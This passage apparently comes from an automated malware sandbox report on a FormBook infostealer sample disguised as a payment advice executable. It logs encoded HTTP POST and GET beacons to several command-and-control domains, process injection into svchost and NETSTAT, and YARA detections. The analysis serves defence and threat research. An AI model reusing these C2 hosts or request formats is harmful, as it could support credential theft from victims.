[TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.450006203.161.43.245802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:41.499671936 CEST498OUTGET /fes8/?xNv=cTPMtmydtIOcZN1EpbOznD6DHSF1GJA5rrzAazo95AkGy7xpXMeTb2ED7e9G6zC4vj43JKFjl9b/uRwCEgcjRW9DYZ4o78I1UccG1j+HCTKiHQxKTun3ViY=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1
                        Host: www.healtpro.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Language: en-US,en
                        Connection: close
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Oct 10, 2024 10:08:42.116027117 CEST610INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:42 GMT
                        Server: Apache
                        X-Frame-Options: SAMEORIGIN
                        Content-Length: 389
                        X-XSS-Protection: 1; mode=block
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.450007104.21.11.31802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:47.167345047 CEST757OUTPOST /3rsv/ HTTP/1.1
                        Host: www.b5x7vk.agency
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.b5x7vk.agency
                        Content-Length: 200
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.b5x7vk.agency/3rsv/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 38 4b 2f 65 56 2b 6b 67 70 66 38 34 36 31 59 4e 4b 67 64 65 74 50 61 43 4b 32 38 53 49 33 53 72 53 57 43 48 6e 54 32 70 51 66 4a 48 76 4f 2f 4e 56 77 45 57 55 34 50 74 34 34 6d 2b 64 44 49 47 68 68 67 33 35 4d 56 61 67 68 2b 56 78 6c 44 62 42 62 71 79 30 69 62 78 50 72 59 36 47 79 4c 6e 4e 33 48 74 32 54 46 4d 49 74 31 47 49 6d 65 4e 2b 62 54 54 4d 56 64 58 78 41 58 4b 66 54 39 62 75 30 6a 50 6f 4f 72 53 32 48 6e 62 65 48 30 35 72 2b 61 45 79 7a 68 45 43 6a 30 2b 33 76 76 59 54 4c 41 76 58 59 78 52 38 43 4f 42 77 6f 2f 70 52 44 59 74 50 48 51 72 4e 53 65 2f 7a 61 56 54 66 77 3d 3d
                        Data Ascii: xNv=8K/eV+kgpf8461YNKgdetPaCK28SI3SrSWCHnT2pQfJHvO/NVwEWU4Pt44m+dDIGhhg35MVagh+VxlDbBbqy0ibxPrY6GyLnN3Ht2TFMIt1GImeN+bTTMVdXxAXKfT9bu0jPoOrS2HnbeH05r+aEyzhECj0+3vvYTLAvXYxR8COBwo/pRDYtPHQrNSe/zaVTfw==
                        Oct 10, 2024 10:08:48.099983931 CEST614INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:48 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hnb5xHf90hZxJkJDfW%2B52BoxkAeQBb75kdlvCMy4QBICfjepzilPOnSN6ytLc2HzauLLKhcrCvQZyqP89xySCM73WIswB2utuTIiVdHU720CB4Py0MoXAqfbiUQ6lYnBqPs%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8d051fe14b1c0dc7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                        Data Ascii: f
                        Oct 10, 2024 10:08:48.100625992 CEST110INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                        Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.450008104.21.11.31802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:49.723216057 CEST777OUTPOST /3rsv/ HTTP/1.1
                        Host: www.b5x7vk.agency
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.b5x7vk.agency
                        Content-Length: 220
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.b5x7vk.agency/3rsv/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 38 4b 2f 65 56 2b 6b 67 70 66 38 34 36 57 41 4e 5a 48 68 65 76 76 61 42 57 47 38 53 44 58 53 76 53 57 4f 48 6e 52 61 35 51 71 68 48 76 75 50 4e 55 78 45 57 59 59 50 74 71 59 6d 42 5a 44 49 52 68 68 73 2f 35 4f 52 61 67 68 36 56 78 6c 7a 62 42 73 32 78 31 79 62 2f 55 62 59 34 62 69 4c 6e 4e 33 48 74 32 53 67 72 49 73 52 47 49 57 75 4e 2f 35 33 55 51 46 64 55 32 41 58 4b 53 7a 38 53 75 30 69 59 6f 4d 4f 33 32 46 76 62 65 48 6b 35 71 73 2b 48 34 7a 68 43 63 54 30 6f 79 4e 6d 58 58 59 35 6c 4b 37 6c 73 39 68 4b 54 38 4f 75 7a 41 79 35 36 64 48 30 59 51 56 58 4c 2b 5a 6f 61 45 2b 6c 61 4c 76 37 34 42 4c 31 48 30 57 42 67 73 30 6d 66 33 6e 67 3d
                        Data Ascii: xNv=8K/eV+kgpf846WANZHhevvaBWG8SDXSvSWOHnRa5QqhHvuPNUxEWYYPtqYmBZDIRhhs/5ORagh6VxlzbBs2x1yb/UbY4biLnN3Ht2SgrIsRGIWuN/53UQFdU2AXKSz8Su0iYoMO32FvbeHk5qs+H4zhCcT0oyNmXXY5lK7ls9hKT8OuzAy56dH0YQVXL+ZoaE+laLv74BL1H0WBgs0mf3ng=
                        Oct 10, 2024 10:08:50.708673000 CEST713INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:50 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xnBmf266scKHJGfxVtHuRnMp1F7fLdWZfKhKAWfxmVjC3NJGOAWYxy0FGzOFBPgJ8z2N%2BX2n5VbY5LPoY%2BFBklPcNYMW5OTBdDiPHUHq3Cwo%2B1neitaTzQOWriK%2FYpM3qWC6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8d051ff12e2a42f7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                        Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                        Oct 10, 2024 10:08:50.708858013 CEST5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.450009104.21.11.31802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:52.270755053 CEST10859OUTPOST /3rsv/ HTTP/1.1
                        Host: www.b5x7vk.agency
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.b5x7vk.agency
                        Content-Length: 10300
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.b5x7vk.agency/3rsv/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 38 4b 2f 65 56 2b 6b 67 70 66 38 34 36 57 41 4e 5a 48 68 65 76 76 61 42 57 47 38 53 44 58 53 76 53 57 4f 48 6e 52 61 35 51 71 35 48 76 39 33 4e 57 53 73 57 5a 59 50 74 78 59 6d 45 5a 44 49 51 68 68 30 37 35 4f 4d 76 67 6a 79 56 79 45 54 62 57 49 43 78 37 79 62 2f 4c 72 59 31 47 79 4b 39 4e 33 33 68 32 53 77 72 49 73 52 47 49 55 32 4e 34 72 54 55 53 46 64 58 78 41 58 65 66 54 39 37 75 30 4b 49 6f 4d 4c 43 32 32 33 62 64 6d 55 35 6f 66 61 48 77 7a 68 41 64 54 31 72 79 4e 37 58 58 59 6c 48 4b 36 68 43 39 6d 43 54 74 71 58 33 46 41 70 51 42 42 6b 42 50 31 4c 2b 32 4f 45 4b 42 2f 68 37 41 36 37 50 65 65 56 75 33 6b 49 56 30 57 79 6b 69 7a 44 79 77 62 46 77 6c 6a 30 35 70 74 68 48 68 78 6a 61 4b 4c 75 57 39 64 31 7a 58 66 67 45 45 6c 36 49 66 65 2f 48 70 74 67 63 43 5a 6e 47 6f 6b 65 42 62 72 65 2f 51 65 75 48 4f 71 78 38 4b 51 56 61 65 37 4c 53 69 6c 5a 54 7a 4f 37 4b 7a 53 2b 2b 50 57 41 43 39 2f 42 71 76 66 6d 38 45 6a 37 74 47 34 63 4f 31 41 50 48 55 67 63 7a 4c 41 72 63 5a 78 38 50 30 79 [TRUNCATED]
                        Data Ascii: xNv=8K/eV+kgpf846WANZHhevvaBWG8SDXSvSWOHnRa5Qq5Hv93NWSsWZYPtxYmEZDIQhh075OMvgjyVyETbWICx7yb/LrY1GyK9N33h2SwrIsRGIU2N4rTUSFdXxAXefT97u0KIoMLC223bdmU5ofaHwzhAdT1ryN7XXYlHK6hC9mCTtqX3FApQBBkBP1L+2OEKB/h7A67PeeVu3kIV0WykizDywbFwlj05pthHhxjaKLuW9d1zXfgEEl6Ife/HptgcCZnGokeBbre/QeuHOqx8KQVae7LSilZTzO7KzS++PWAC9/Bqvfm8Ej7tG4cO1APHUgczLArcZx8P0ypDGdRgzb9lY2ng4kWNStMiKpaVvuEOmcwIXov605KJCXq+JyPC/5lWvkUVJYGnbiZQftk6uzOxx8IbuYCbOpesSnIaC4AJVzPI9jiRA4cQdPSQ7UvOeRTDLVTdEQjhIVCCmvzREqemZvz4SE/MmyPHWpxhTp7Np1rMZtbdIwVo6XqcKo/HQKHn5BNCGCYbRlkSxpO3YrLe9kfMef4Va4GzZzjJNhHyK+dWXYC1RhbwDF/3yEWgJtCH5LBMKbn2gjW3ooRZcWyHeEEwstbCVN01iKhi41TacZn+/jlFZjXk2uI7hqEutL1vI3dwoza/XKD94hiNeoby7+9vxyvu3PfNB/G0944OyZoInz5/vKGhbkURFpEJPsgs0GMg8FHFZv0aqigYW+Wy/oE4HPQeZjrdOQiNUBe/IZbecpE0E2R8pGJzcKDcyeM4jNz5SE1yspg3yz833upjG4eND3VTXfE2Lb8qsfdC8nODODBWcHJj6S7gFgFwcv+tLuHHPf/+YdSpjl+v3XaRikpTOPRDFEn1VyP0aRTLb+JywH53uOj6b8fJVK+TNT89y2N7w+0Kwjd3BfDCEqo/ni5oZtb/C31E+74xc+jFF4Qk41YHi02gbj6Ji22mYbKUTr+qGMtYJAViI4AVdqcIE6LtrSLwnfogb5dOxgOv+hlQ [TRUNCATED]
                        Oct 10, 2024 10:08:53.309482098 CEST720INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:53 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BBRvmjHAN5uH7z1Uwmb7cCpp0dAsup%2BoiR5QVx1znMUTyTwnj20dEnKwO63VGQwjJ2sEzFLI0IndB27tB2j33%2FPEa%2BjkCJB96e6tbxO9qpCa0yKtKS5bGS2hZu%2FQEFHotHYXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8d052001491a8c3c-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.450010104.21.11.31802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:08:54.815498114 CEST499OUTGET /3rsv/?xNv=xIX+WL4Gosls7mMvG39YjczwIlc5FH+9QHTcqjrnYPts9+3MRA8haYPK8pqgYSQnqVoX+MtR4yK2qH2ERM2vlkvqHJkEK2jfahGH5woqObRGQGud+bD1SW8=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1
                        Host: www.b5x7vk.agency
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Language: en-US,en
                        Connection: close
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Oct 10, 2024 10:08:55.805896044 CEST778INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Oct 2024 08:08:55 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FFpYnTOZs%2F4Qz4Uny3QpIRrvSdA2JgPRyNMrXSO1hwkZFKdnLJgY%2BqojIQr6cDDMmjWOlPoabOqxqA%2BxN7%2FwapVD4dw%2Bwmu3d%2F8S8uvIufirwB2RV8JR5x16LYicK1p4NTmHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Speculation-Rules: "/cdn-cgi/speculation"
                        Server: cloudflare
                        CF-RAY: 8d0520110b546a53-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.450011154.23.184.240802088C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        TimestampBytes transferredDirectionData
                        Oct 10, 2024 10:09:01.032438993 CEST745OUTPOST /4jol/ HTTP/1.1
                        Host: www.wcq24.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Accept-Encoding: gzip, deflate
                        Accept-Language: en-US,en
                        Origin: http://www.wcq24.top
                        Content-Length: 200
                        Connection: close
                        Cache-Control: max-age=0
                        Content-Type: application/x-www-form-urlencoded
                        Referer: http://www.wcq24.top/4jol/
                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
                        Data Raw: 78 4e 76 3d 6e 54 4e 75 70 6d 52 54 4c 43 71 6f 72 37 76 70 69 48 78 6f 78 77 6d 66 79 7a 62 2b 4a 52 39 41 30 6d 54 51 4f 32 5a 4a 48 45 46 39 73 5a 6b 49 62 44 2f 77 37 49 55 6c 52 5a 6a 2f 31 65 49 39 46 64 48 4a 2f 6b 37 77 66 2f 62 4c 44 53 75 53 77 48 47 77 67 31 49 34 76 34 35 52 64 35 4a 55 4c 6f 49 65 67 7a 76 32 30 4f 6f 56 57 51 73 49 72 7a 56 4d 44 30 4f 54 64 2b 72 4e 69 36 4f 6e 38 35 69 6b 48 58 61 63 72 45 71 74 7a 52 63 75 2b 46 74 76 6d 6f 71 52 50 38 42 64 67 46 7a 50 57 68 75 42 36 2b 45 58 67 75 46 79 4f 6a 64 33 76 6c 6b 4f 42 32 6d 78 68 4a 45 64 7a 30 72 42 66 41 3d 3d
                        Data Ascii: xNv=nTNupmRTLCqor7vpiHxoxwmfyzb+JR9A0mTQO2ZJHEF9sZkIbD/w7IUlRZj/1eI9FdHJ/k7wf/bLDSuSwHGwg1I4v45Rd5JULoIegzv20OoVWQsIrzVMD0OTd+rNi6On85ikHXacrEqtzRcu+FtvmoqRP8BdgFzPWhuB6+EXguFyOjd3vlkOB2mxhJEdz0rBfA==
                        Oct 10, 2024 10:09:01.906585932 CEST312INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Thu, 10 Oct 2024 08:09:01 GMT
                        Content-Type: text/html
                        Content-Length: 148
                        Connection: close
                        ETag: "66a7679f-94"
                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:04:06:56
                        Start date:10/10/2024
                        Path:C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"
                        Imagebase:0x400000
                        File size:1'352'983 bytes
                        MD5 hash:E4E701C5D72FE6E72D12C76B44B7436B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:04:06:58
                        Start date:10/10/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"
                        Imagebase:0x8b0000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:04:07:50
                        Start date:10/10/2024
                        Path:C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe"
                        Imagebase:0x2e0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:6
                        Start time:04:07:53
                        Start date:10/10/2024
                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                        Imagebase:0x900000
                        File size:32'768 bytes
                        MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:moderate
                        Has exited:false

                        General

                        Target ID:7
                        Start time:04:08:06
                        Start date:10/10/2024
                        Path:C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe"
                        Imagebase:0x2e0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
